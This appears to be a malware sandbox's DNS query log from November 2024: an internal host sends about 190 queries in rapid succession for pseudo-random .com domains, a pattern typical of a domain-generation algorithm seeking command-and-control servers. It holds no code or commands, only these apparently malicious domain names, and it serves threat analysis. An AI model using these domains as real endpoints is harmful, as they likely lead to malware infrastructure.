                                                                                                                                                                                                            Nov 11, 2024 18:08:15.983110905 CET192.168.2.91.1.1.10xb838Standard query (0)lysyfin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.985913992 CET192.168.2.91.1.1.10x992bStandard query (0)vojyjyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.987380028 CET192.168.2.91.1.1.10x8459Standard query (0)qeqyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:15.989178896 CET192.168.2.91.1.1.10x28e7Standard query (0)gadyfob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.029095888 CET192.168.2.91.1.1.10xc374Standard query (0)lykyjux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.029095888 CET192.168.2.91.1.1.10xf40Standard query (0)vowydic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.030627012 CET192.168.2.91.1.1.10x702Standard query (0)purydip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.031006098 CET192.168.2.91.1.1.10x149bStandard query (0)gacyzaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.031799078 CET192.168.2.91.1.1.10xd8d2Standard query (0)vocyzek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.032968998 CET192.168.2.91.1.1.10xa216Standard query (0)lyryfox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.033337116 CET192.168.2.91.1.1.10xc976Standard query (0)puvyxeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.033485889 CET192.168.2.91.1.1.10xce86Standard query (0)qetyfop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.036442995 CET192.168.2.91.1.1.10xee22Standard query (0)lygymyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.036844969 CET192.168.2.91.1.1.10x3aaaStandard query (0)gahyqub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.037039995 CET192.168.2.91.1.1.10xac33Standard query (0)vojyquf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.037533998 CET192.168.2.91.1.1.10x3deStandard query (0)pujywiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.040988922 CET192.168.2.91.1.1.10x97efStandard query (0)vopybok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.060264111 CET192.168.2.91.1.1.10xc429Standard query (0)pujyjup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.061386108 CET192.168.2.91.1.1.10x1877Standard query (0)vonypyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.069300890 CET192.168.2.91.1.1.10xc9ecStandard query (0)qeqysuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.069509983 CET192.168.2.91.1.1.10x1584Standard query (0)puzylol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.069772005 CET192.168.2.91.1.1.10xd362Standard query (0)gadyneh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.069839001 CET192.168.2.91.1.1.10x53a7Standard query (0)lymyxex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.077364922 CET192.168.2.91.1.1.10xc725Standard query (0)qebyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.078773975 CET192.168.2.91.1.1.10xc54cStandard query (0)pumypyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.079189062 CET192.168.2.91.1.1.10x11d0Standard query (0)volykit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.079622984 CET192.168.2.91.1.1.10x285fStandard query (0)lyryvur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.079854012 CET192.168.2.91.1.1.10x86b3Standard query (0)puvytag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.080020905 CET192.168.2.91.1.1.10x33a0Standard query (0)lysynaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.084590912 CET192.168.2.91.1.1.10xfd1Standard query (0)qedynaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.084768057 CET192.168.2.91.1.1.10x1ffeStandard query (0)qegyqug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.084942102 CET192.168.2.91.1.1.10x4497Standard query (0)gaqydus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.085102081 CET192.168.2.91.1.1.10xfe6dStandard query (0)qetyvil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.085382938 CET192.168.2.91.1.1.10x3883Standard query (0)pufymyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.085613966 CET192.168.2.91.1.1.10x780bStandard query (0)lyvyxyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.085827112 CET192.168.2.91.1.1.10x5df3Standard query (0)gahyhys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.086057901 CET192.168.2.91.1.1.10x623eStandard query (0)qekykup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.086227894 CET192.168.2.91.1.1.10x6f9aStandard query (0)galykiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.088592052 CET192.168.2.91.1.1.10x8b3bStandard query (0)pupyboq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.088818073 CET192.168.2.91.1.1.10x99d5Standard query (0)qexylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.089006901 CET192.168.2.91.1.1.10x13d0Standard query (0)gatyfaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.094861984 CET192.168.2.91.1.1.10x6ecdStandard query (0)lyxylor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.095441103 CET192.168.2.91.1.1.10x912aStandard query (0)vofymem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.099433899 CET192.168.2.91.1.1.10xe1c1Standard query (0)gacyroh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.099653959 CET192.168.2.91.1.1.10xfac1Standard query (0)gatyviw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.099996090 CET192.168.2.91.1.1.10x1e8aStandard query (0)volyquk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.104059935 CET192.168.2.91.1.1.10x4232Standard query (0)ganypeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.104232073 CET192.168.2.91.1.1.10xf437Standard query (0)lyvytan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.107846975 CET192.168.2.91.1.1.10xc48aStandard query (0)lymysud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.439812899 CET192.168.2.91.1.1.10x8975Standard query (0)gadyduz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.443099976 CET192.168.2.91.1.1.10x9cb9Standard query (0)puzymev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.444900990 CET192.168.2.91.1.1.10xadc3Standard query (0)qeqyloq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.461882114 CET192.168.2.91.1.1.10xbdd9Standard query (0)pufydul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.462102890 CET192.168.2.91.1.1.10xa187Standard query (0)lymylij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.471875906 CET192.168.2.91.1.1.10x99ddStandard query (0)lygyfir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.481245041 CET192.168.2.91.1.1.10xe507Standard query (0)ganyriz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.481743097 CET192.168.2.91.1.1.10xec10Standard query (0)qekyheq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.496695042 CET192.168.2.91.1.1.10xf73aStandard query (0)lyxymed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.504158020 CET192.168.2.91.1.1.10xc5f9Standard query (0)gaqyzoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.504600048 CET192.168.2.91.1.1.10x5579Standard query (0)lysyvud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.504786015 CET192.168.2.91.1.1.10x2271Standard query (0)galyheh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:16.603379965 CET192.168.2.91.1.1.10xa11aStandard query (0)qexyqyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.229906082 CET192.168.2.91.1.1.10xeccfStandard query (0)lysyfyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.235205889 CET192.168.2.91.1.1.10x734eStandard query (0)qekyqop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.235912085 CET192.168.2.91.1.1.10x1909Standard query (0)vonyzuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.450068951 CET192.168.2.91.1.1.10x9d57Standard query (0)qetyfuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.476017952 CET192.168.2.91.1.1.10x49e7Standard query (0)lyxywer.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.481046915 CET192.168.2.91.1.1.10x15ccStandard query (0)lygygin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.506999969 CET192.168.2.91.1.1.10x6041Standard query (0)lykymyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.561667919 CET192.168.2.91.1.1.10xd3dbStandard query (0)gahyhob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.571018934 CET192.168.2.91.1.1.10x161Standard query (0)pumyxiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.593882084 CET192.168.2.91.1.1.10x111dStandard query (0)puvytuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.594113111 CET192.168.2.91.1.1.10x3144Standard query (0)vocyruk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.594513893 CET192.168.2.91.1.1.10xc31Standard query (0)purycap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.594747066 CET192.168.2.91.1.1.10xdfc0Standard query (0)lyryvex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.594928980 CET192.168.2.91.1.1.10xb675Standard query (0)gacyryw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.598212004 CET192.168.2.91.1.1.10x6bd6Standard query (0)lymyxid.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.600555897 CET192.168.2.91.1.1.10x3ed3Standard query (0)qeqyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.601407051 CET192.168.2.91.1.1.10xed10Standard query (0)qedyfyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.602698088 CET192.168.2.91.1.1.10xd528Standard query (0)puzywel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.607561111 CET192.168.2.91.1.1.10x7217Standard query (0)pufygug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.607834101 CET192.168.2.91.1.1.10x9a35Standard query (0)vofygum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.609205961 CET192.168.2.91.1.1.10x9612Standard query (0)gadyfuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.616600990 CET192.168.2.91.1.1.10x9333Standard query (0)galyqaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.616774082 CET192.168.2.91.1.1.10x8276Standard query (0)vowycac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.627612114 CET192.168.2.91.1.1.10xebd9Standard query (0)volyqat.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.627851963 CET192.168.2.91.1.1.10x80b6Standard query (0)gaqycos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.639084101 CET192.168.2.91.1.1.10xe647Standard query (0)qegyhig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.643153906 CET192.168.2.91.1.1.10x828dStandard query (0)qexyryl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.702573061 CET192.168.2.91.1.1.10x64f9Standard query (0)pujymel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.705095053 CET192.168.2.91.1.1.10x783Standard query (0)pufybop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.717345953 CET192.168.2.91.1.1.10x4e06Standard query (0)puzyjyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:17.733721972 CET192.168.2.91.1.1.10x866dStandard query (0)gacykub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.095849037 CET192.168.2.91.1.1.10xfa4fStandard query (0)vowypek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.241224051 CET192.168.2.91.1.1.10x2ec8Standard query (0)lyvylod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.247834921 CET192.168.2.91.1.1.10xa65fStandard query (0)qetysuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.255080938 CET192.168.2.91.1.1.10xe0edStandard query (0)vojyjof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.296621084 CET192.168.2.91.1.1.10xbafcStandard query (0)qegynap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.312520981 CET192.168.2.91.1.1.10x902eStandard query (0)qekyqyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.314307928 CET192.168.2.91.1.1.10x7035Standard query (0)gatyduh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.585989952 CET192.168.2.91.1.1.10xd72Standard query (0)qeqytal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.586405993 CET192.168.2.91.1.1.10x42c5Standard query (0)qegyfil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.586735964 CET192.168.2.91.1.1.10xeefbStandard query (0)vofydut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.587270021 CET192.168.2.91.1.1.10xa0c7Standard query (0)ganyzas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.587696075 CET192.168.2.91.1.1.10xd660Standard query (0)qexykug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.588246107 CET192.168.2.91.1.1.10x743bStandard query (0)puvyliv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.588615894 CET192.168.2.91.1.1.10xd235Standard query (0)vopydum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.589270115 CET192.168.2.91.1.1.10x7b17Standard query (0)qebylov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.589689016 CET192.168.2.91.1.1.10xf1edStandard query (0)gaqypew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.590451956 CET192.168.2.91.1.1.10x9bc8Standard query (0)lyrysyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.591206074 CET192.168.2.91.1.1.10x5e01Standard query (0)vojymet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.591520071 CET192.168.2.91.1.1.10x6b9dStandard query (0)pupycuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.592205048 CET192.168.2.91.1.1.10x8432Standard query (0)lymytar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.592720032 CET192.168.2.91.1.1.10xe38bStandard query (0)vofybic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.593354940 CET192.168.2.91.1.1.10x36c1Standard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.594048023 CET192.168.2.91.1.1.10xff36Standard query (0)vowyzam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.594851971 CET192.168.2.91.1.1.10x170Standard query (0)vocykif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.596028090 CET192.168.2.91.1.1.10x60b8Standard query (0)vonyrot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.596468925 CET192.168.2.91.1.1.10x4f6eStandard query (0)vocyquc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.597269058 CET192.168.2.91.1.1.10x3761Standard query (0)pupydig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.597718000 CET192.168.2.91.1.1.10xe0f1Standard query (0)lygynox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.598216057 CET192.168.2.91.1.1.10x221fStandard query (0)gahynaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.598488092 CET192.168.2.91.1.1.10xf6f5Standard query (0)purypyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.662081003 CET192.168.2.91.1.1.10xef3Standard query (0)gacyqys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.662730932 CET192.168.2.91.1.1.10x6eb6Standard query (0)qedyvuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.667296886 CET192.168.2.91.1.1.10xbc51Standard query (0)volyjym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.667690039 CET192.168.2.91.1.1.10x4f07Standard query (0)puvywup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.687767982 CET192.168.2.91.1.1.10x8397Standard query (0)vojygok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.688606977 CET192.168.2.91.1.1.10x742dStandard query (0)lyvywux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.689116955 CET192.168.2.91.1.1.10xf36Standard query (0)lykygaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.708091974 CET192.168.2.91.1.1.10x2115Standard query (0)gadyvis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.708120108 CET192.168.2.91.1.1.10x66ecStandard query (0)vopycyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.708724976 CET192.168.2.91.1.1.10xfb45Standard query (0)qebyrip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.709018946 CET192.168.2.91.1.1.10x216aStandard query (0)puryxag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.709084988 CET192.168.2.91.1.1.10xab6cStandard query (0)gahyfow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.709564924 CET192.168.2.91.1.1.10x213fStandard query (0)gatycyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.714742899 CET192.168.2.91.1.1.10xcc1Standard query (0)qetyxeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.714936972 CET192.168.2.91.1.1.10x99bbStandard query (0)pujygaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.715132952 CET192.168.2.91.1.1.10x331Standard query (0)pumytol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:18.722619057 CET192.168.2.91.1.1.10x92a4Standard query (0)lyryxen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.249222040 CET192.168.2.91.1.1.10xde18Standard query (0)volymaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.262485981 CET192.168.2.91.1.1.10x9dc1Standard query (0)qexynol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.288921118 CET192.168.2.91.1.1.10x3452Standard query (0)qegysyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.289572001 CET192.168.2.91.1.1.10xebfbStandard query (0)pufypeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.293586969 CET192.168.2.91.1.1.10xb795Standard query (0)puvymaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.302371025 CET192.168.2.91.1.1.10x6087Standard query (0)gahydyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.316040993 CET192.168.2.91.1.1.10x9f4fStandard query (0)gacynow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.316464901 CET192.168.2.91.1.1.10x89aStandard query (0)qebyqeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.327708960 CET192.168.2.91.1.1.10x2af9Standard query (0)purylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.334991932 CET192.168.2.91.1.1.10x6d3aStandard query (0)vocymak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.335695982 CET192.168.2.91.1.1.10x7812Standard query (0)lygysen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.364603996 CET192.168.2.91.1.1.10xdacaStandard query (0)pupyxal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.374737024 CET192.168.2.91.1.1.10x19fbStandard query (0)gadycew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.375483990 CET192.168.2.91.1.1.10xb67fStandard query (0)qeqyrug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.377995014 CET192.168.2.91.1.1.10xe470Standard query (0)vofycyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.397258997 CET192.168.2.91.1.1.10x43fStandard query (0)qekyfiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.397483110 CET192.168.2.91.1.1.10x6e0fStandard query (0)galyfis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.397840023 CET192.168.2.91.1.1.10x10a4Standard query (0)vonykuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.398747921 CET192.168.2.91.1.1.10x26c7Standard query (0)gatypas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.398977995 CET192.168.2.91.1.1.10x81daStandard query (0)puzygop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.399158955 CET192.168.2.91.1.1.10x7dc3Standard query (0)lyxygax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.399425983 CET192.168.2.91.1.1.10xe698Standard query (0)pupypep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.399606943 CET192.168.2.91.1.1.10x340fStandard query (0)vonyqym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.399786949 CET192.168.2.91.1.1.10x64aeStandard query (0)vojybim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.406569004 CET192.168.2.91.1.1.10xec4eStandard query (0)lymywun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.406596899 CET192.168.2.91.1.1.10xe2ddStandard query (0)lysyxar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.407337904 CET192.168.2.91.1.1.10xb170Standard query (0)qekynog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.407979965 CET192.168.2.91.1.1.10xfeStandard query (0)pujybig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.500380039 CET192.168.2.91.1.1.10x8300Standard query (0)lysysyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.566740036 CET192.168.2.91.1.1.10x7ed4Standard query (0)vowykuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.567478895 CET192.168.2.91.1.1.10x8050Standard query (0)vojyduf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.568136930 CET192.168.2.91.1.1.10x9568Standard query (0)pumyliq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.568391085 CET192.168.2.91.1.1.10xd89dStandard query (0)lyrylix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.568598986 CET192.168.2.91.1.1.10x82d4Standard query (0)gaqykus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.568780899 CET192.168.2.91.1.1.10x730cStandard query (0)lykyfud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.568931103 CET192.168.2.91.1.1.10x5046Standard query (0)qedysyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.569103956 CET192.168.2.91.1.1.10x82bcStandard query (0)vopyzot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.571547985 CET192.168.2.91.1.1.10xb933Standard query (0)puvyjyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.571751118 CET192.168.2.91.1.1.10x431aStandard query (0)ganykuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.571938038 CET192.168.2.91.1.1.10x7c89Standard query (0)gahyvuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.572105885 CET192.168.2.91.1.1.10xe42aStandard query (0)lykynon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.572271109 CET192.168.2.91.1.1.10xb1faStandard query (0)vopypec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.572439909 CET192.168.2.91.1.1.10x8e1aStandard query (0)qebykul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 11, 2024 18:08:19.572622061 CET192.168.2.91.1.1.10xfbd8Standard query (0)lyrytod.comA (IP address)IN (0x0001)false
